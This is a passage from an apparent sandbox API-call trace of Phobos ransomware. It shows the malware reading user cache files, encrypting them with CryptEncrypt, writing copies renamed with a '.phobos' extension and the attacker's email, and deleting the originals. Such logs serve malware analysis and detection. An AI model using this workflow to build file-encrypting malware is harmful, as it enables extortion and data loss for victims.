pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0187.438] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.438] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0187.438] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.438] CloseHandle (hObject=0x130) returned 1 [0187.438] CloseHandle (hObject=0x160) returned 1 [0187.438] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgX5G[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegx5g[1].jpg")) returned 1 [0187.439] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.440] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=588) returned 1 [0187.440] CloseHandle (hObject=0x160) returned 1 [0187.440] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png")) returned 0x2020 [0187.440] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.440] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.440] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.441] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.441] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.441] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x24c, lpOverlapped=0x0) returned 1 [0187.468] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250, dwBufLen=0x250 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250) returned 1 [0187.468] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x250, lpOverlapped=0x0) returned 1 [0187.469] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0187.469] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.469] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0187.469] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.469] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0187.469] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.469] CloseHandle (hObject=0x160) returned 1 [0187.469] CloseHandle (hObject=0x130) returned 1 [0187.469] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBmUxRK[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbmuxrk[1].png")) returned 1 [0187.470] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.471] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=920) returned 1 [0187.471] CloseHandle (hObject=0x130) returned 1 [0187.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png")) returned 0x2020 [0187.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.471] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.471] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.472] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.472] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.472] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x398, lpOverlapped=0x0) returned 1 [0187.490] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a0, dwBufLen=0x3a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a0) returned 1 [0187.490] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3a0, lpOverlapped=0x0) returned 1 [0187.491] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0187.491] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.491] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0187.491] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.491] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0187.491] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.491] CloseHandle (hObject=0x130) returned 1 [0187.492] CloseHandle (hObject=0x160) returned 1 [0187.492] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBndhJA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbndhja[1].png")) returned 1 [0187.493] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.494] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=560) returned 1 [0187.494] CloseHandle (hObject=0x160) returned 1 [0187.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png")) returned 0x2020 [0187.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.494] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.494] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.495] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.495] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.495] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x230, lpOverlapped=0x0) returned 1 [0187.526] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x240, dwBufLen=0x240 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x240) returned 1 [0187.526] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x240, lpOverlapped=0x0) returned 1 [0187.527] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0187.527] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.527] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0187.527] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.527] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0187.527] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.527] CloseHandle (hObject=0x160) returned 1 [0187.527] CloseHandle (hObject=0x130) returned 1 [0187.527] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBoqF0J[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bboqf0j[1].png")) returned 1 [0187.528] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.529] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=278) returned 1 [0187.529] CloseHandle (hObject=0x130) returned 1 [0187.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png")) returned 0x2020 [0187.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.529] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.529] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.530] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.530] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.530] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x116, lpOverlapped=0x0) returned 1 [0187.574] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0187.574] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0187.575] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0187.575] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.575] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0187.575] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.575] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0187.575] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.576] CloseHandle (hObject=0x130) returned 1 [0187.576] CloseHandle (hObject=0x160) returned 1 [0187.576] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBzjV9E[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbzjv9e[1].png")) returned 1 [0187.577] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.578] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=130479) returned 1 [0187.578] CloseHandle (hObject=0x160) returned 1 [0187.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg")) returned 0x2020 [0187.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.578] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.578] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.578] CreateFileW 